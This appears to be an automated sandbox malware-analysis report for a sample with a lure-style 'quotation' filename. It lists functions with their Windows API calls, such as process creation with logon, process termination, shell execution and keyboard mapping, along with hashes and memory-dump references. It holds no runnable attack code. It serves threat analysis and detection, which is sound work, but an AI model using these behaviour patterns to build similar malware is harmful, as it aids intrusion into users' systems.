                                                                            • Opcode Fuzzy Hash: 5c033eca0e0f4abf6b6898d88fb37703c1f93876195a1cf9357913b604c96b2a
                                                                            • Instruction Fuzzy Hash: 4C419D30144240EFD721DF25CC88FBB7BAAEF86324F144269F994872E1CB71A945DB61
                                                                            Function 006A07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 006A080C
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 006A0847
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 006A0863
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 006A08DC
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006A08F3
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006A0921
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3368777196-0
                                                                            • Opcode ID: 130aa015e59e9b0cb8d5d5491cc6f790fa1a4ef395db2318d49bbdfa42cf786d
                                                                            • Instruction ID: eaf372dd3a4977587e7cef7da65df868ee3978866f7c097251f82ac181342373
                                                                            • Opcode Fuzzy Hash: 130aa015e59e9b0cb8d5d5491cc6f790fa1a4ef395db2318d49bbdfa42cf786d
                                                                            • Instruction Fuzzy Hash: 0B418971900205EFEF04AF54DC85AAAB7BAFF05310F1440A9ED049A297DB34EE65DBA4
                                                                            Function 006C81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0068F3AB,00000000,?,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 006C824C
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 006C8272
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006C82D1
                                                                            • ShowWindow.USER32(00000000,00000004), ref: 006C82E5
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 006C830B
                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 006C832F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: aca1819a518423e9285c4dccde99b747d07472688694b13181b5e6854c7e05f4
                                                                            • Instruction ID: 34e0296d85d26f7c9d415a10b9cde3696c444b11e0d0cbd22ed8c34e6e6ff788
                                                                            • Opcode Fuzzy Hash: aca1819a518423e9285c4dccde99b747d07472688694b13181b5e6854c7e05f4
                                                                            • Instruction Fuzzy Hash: 22418E34601684EFDB21CF55C899FF47BE2FB4A714F1852ADE5084B2A2CB35A941CB94
                                                                            Function 0069175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00690FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00690FCA
                                                                              • Part of subcall function 00690FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00690FD6
                                                                              • Part of subcall function 00690FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00690FE5
                                                                              • Part of subcall function 00690FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00690FEC
                                                                              • Part of subcall function 00690FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00691002
                                                                            • GetLengthSid.ADVAPI32(?,00000000,00691335), ref: 006917AE
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006917BA
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 006917C1
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 006917DA
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00691335), ref: 006917EE
                                                                            • HeapFree.KERNEL32(00000000), ref: 006917F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            • Opcode ID: 7b5675f80dc0f669d4937243d7ee998254505acad5d7c43f2682ac07928bfac3
                                                                            • Instruction ID: 9e48a3e1659e810a77a9cdd592359de6eaa93ceb10556cc301088cee8d520f71
                                                                            • Opcode Fuzzy Hash: 7b5675f80dc0f669d4937243d7ee998254505acad5d7c43f2682ac07928bfac3
                                                                            • Instruction Fuzzy Hash: 28116A32600606EFDF109FA5CC49FFE7BAEEB46365F244018F4459B620D736AA45DB60
                                                                            Function 006914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006914FF
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00691506
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00691515
                                                                            • CloseHandle.KERNEL32(00000004), ref: 00691520
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0069154F
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00691563
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: b0c7079e5afc7de5748f68d250af9afe378a67d803cb0fb98afa4703337ceabf
                                                                            • Instruction ID: 4d4b5fe76455b676267084c0bb1d4704adbad01d74ce14aca1b819a99e70f901
                                                                            • Opcode Fuzzy Hash: b0c7079e5afc7de5748f68d250af9afe378a67d803cb0fb98afa4703337ceabf
                                                                            • Instruction Fuzzy Hash: 85114AB250020AABDF11CF94DD49FEA7BAEFB49754F154014FA09A6160C3758E619B60
                                                                            Function 006C8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00649693
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496A2
                                                                              • Part of subcall function 00649639: BeginPath.GDI32(?), ref: 006496B9
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496E2
                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 006C8A4E
                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 006C8A62
                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 006C8A70
                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 006C8A80
                                                                            • EndPath.GDI32(?), ref: 006C8A90
                                                                            • StrokePath.GDI32(?), ref: 006C8AA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 95df582d864c9f61c03b1cf2fdeae83e50bac5da9f9bbf8b8780d89beb6a280e
                                                                            • Instruction ID: 9b51ea21ac2c3e9ea560ad0f1914b36f3ed4f2c87e68c3b5f967e96433b17d10
                                                                            • Opcode Fuzzy Hash: 95df582d864c9f61c03b1cf2fdeae83e50bac5da9f9bbf8b8780d89beb6a280e
                                                                            • Instruction Fuzzy Hash: 47110C76500148FFDB119F90DC48EEA7F6DEB04364F048015FA5996161C7729D55DFA0
                                                                            Function 006951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00695218
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00695229
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00695230
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00695238
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0069524F
                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00695261
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: 8ce79ec3487a0904cac93e92676bdf2579667c82b1985c9c097b73590c67d13b
                                                                            • Instruction ID: a8ad2170a3681884bed36e813a93e36a87ea2eaa006833deba603589be4332b4
                                                                            • Opcode Fuzzy Hash: 8ce79ec3487a0904cac93e92676bdf2579667c82b1985c9c097b73590c67d13b
                                                                            • Instruction Fuzzy Hash: D4018475A01704BBEF105BA69C49E5EBF79EB44361F044066FA09A7280D6709900CB60
                                                                            Function 00631BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00631BF4
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00631BFC
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00631C07
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00631C12
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00631C1A
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00631C22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: 401b396637d4de2aa52170343409ac3a33a33dc9aa844efa54036d259ee5d8ea
                                                                            • Instruction ID: 5f8d45e1b26a60ec8e1f6ea8ac9c405bd6fa4b597f38a7d2339b0a1d449ebdea
                                                                            • Opcode Fuzzy Hash: 401b396637d4de2aa52170343409ac3a33a33dc9aa844efa54036d259ee5d8ea
                                                                            • Instruction Fuzzy Hash: B40167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                                                            Function 0069EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0069EB30
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0069EB46
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0069EB55
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0069EB64
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0069EB6E
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0069EB75
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 86c5c9c2b677bc55e36a366e131dcb60c2f5ab323af713521cdf46cf40f021a6
                                                                            • Instruction ID: 2fd2cdd5cf60b1c2a907e383c312e3e9bb1b92b661a1127d5aa44c6ea7c04c23
                                                                            • Opcode Fuzzy Hash: 86c5c9c2b677bc55e36a366e131dcb60c2f5ab323af713521cdf46cf40f021a6
                                                                            • Instruction Fuzzy Hash: 5BF0BE72600558BBE7205B639D0EEFF3E7DEFCAB25F001158F605D1490D7A01A01C6B4
                                                                            Function 00687439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?), ref: 00687452
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00687469
                                                                            • GetWindowDC.USER32(?), ref: 00687475
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00687484
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00687496
                                                                            • GetSysColor.USER32(00000005), ref: 006874B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                            • String ID:
                                                                            • API String ID: 272304278-0
                                                                            • Opcode ID: 11451fa52282c2053de03c255314352f6b0b4afe8689ecd951dee76200721c60
                                                                            • Instruction ID: ede9d0444b83058bd9d1cbe3e67b81e87ac5486999e9e3e0282e2d60e95bb35e
                                                                            • Opcode Fuzzy Hash: 11451fa52282c2053de03c255314352f6b0b4afe8689ecd951dee76200721c60
                                                                            • Instruction Fuzzy Hash: A7014B31400215EFDB51AFA4DD08FFE7BB6FB04321F655164F919A21A1CB316E52AB50
                                                                            Function 00691874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0069187F
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0069188B
                                                                            • CloseHandle.KERNEL32(?), ref: 00691894
                                                                            • CloseHandle.KERNEL32(?), ref: 0069189C
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006918A5
                                                                            • HeapFree.KERNEL32(00000000), ref: 006918AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: 5d608b9ceba4c780e3d9c17948daa84e335c2087f3b2fd4ab92b7c3c9b822cda
                                                                            • Instruction ID: 52d2bbf725a907b2efd2ce45542b7242bd1ea9397fa8d6adee914378a3982bc8
                                                                            • Opcode Fuzzy Hash: 5d608b9ceba4c780e3d9c17948daa84e335c2087f3b2fd4ab92b7c3c9b822cda
                                                                            • Instruction Fuzzy Hash: CAE0C236404901BBDB015BA2ED0CD1ABB2AFB49B32B109220F229C1870CB329420EB60
                                                                            Function 006B3947 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 006B396B
                                                                            • CharUpperBuffW.USER32(?,?), ref: 006B3A7A
                                                                            • VariantClear.OLEAUT32(?), ref: 006B3C1F
                                                                              • Part of subcall function 006A0CDF: VariantInit.OLEAUT32(00000000), ref: 006A0D1F
                                                                              • Part of subcall function 006A0CDF: VariantCopy.OLEAUT32(?,?), ref: 006A0D28
                                                                              • Part of subcall function 006A0CDF: VariantClear.OLEAUT32(?), ref: 006A0D34
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: d965696b4f4e70d3af3293353f7b0b983f95dd65241cf03451f842fdab2500c4
                                                                            • Instruction ID: 4808ae7f76a45ae96a9aa83dc45fcfd663313c71765ac1081adfd55eaabefc5d
                                                                            • Opcode Fuzzy Hash: d965696b4f4e70d3af3293353f7b0b983f95dd65241cf03451f842fdab2500c4
                                                                            • Instruction Fuzzy Hash: 03917AB56083159FC744DF24C4809AAB7E6FF89314F14882DF8899B351DB30EE46CB96
                                                                            Function 006B4BAD Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?,?,0069035E), ref: 0069002B
                                                                              • Part of subcall function 0069000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690046
                                                                              • Part of subcall function 0069000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690054
                                                                              • Part of subcall function 0069000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?), ref: 00690064
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 006B4C51
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 006B4DCF
                                                                            • CoTaskMemFree.OLE32(?), ref: 006B4DDA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 4175897753-2785691316
                                                                            • Opcode ID: 353df73baf4130d8d84d1eac04942656e8986e75d805be9d01aa8c81185e83ac
                                                                            • Instruction ID: 560c67757f96a1987494aa5c114bfce5be14cb2e980ddda0b2465b1a028bc288
                                                                            • Opcode Fuzzy Hash: 353df73baf4130d8d84d1eac04942656e8986e75d805be9d01aa8c81185e83ac
                                                                            • Instruction Fuzzy Hash: 849108B1D0021DAFDF14DFA4C891EEEBBBABF08310F104569E915A7251DB709A45CFA0
                                                                            Function 006B8CD3 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 193COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00000000,?), ref: 006B8CF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 2358735015-567219261
                                                                            • Opcode ID: 1cd90c915bb1b67269219e239ef034ada49def6830d95d66a1fed82434a1b27a
                                                                            • Instruction ID: d24cf44c6e5d9b451d1a91d18fbbe277e57d381706052fafb749c6abb5329a8b
                                                                            • Opcode Fuzzy Hash: 1cd90c915bb1b67269219e239ef034ada49def6830d95d66a1fed82434a1b27a
                                                                            • Instruction Fuzzy Hash: EF5180B1A041169FCB14DF68C9519FEB7ABAF64324B204229E826E7385DB30DD81CBD0
                                                                            Function 006BAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 006BAEA3
                                                                            • GetProcessId.KERNEL32(00000000), ref: 006BAF38
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BAF67
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
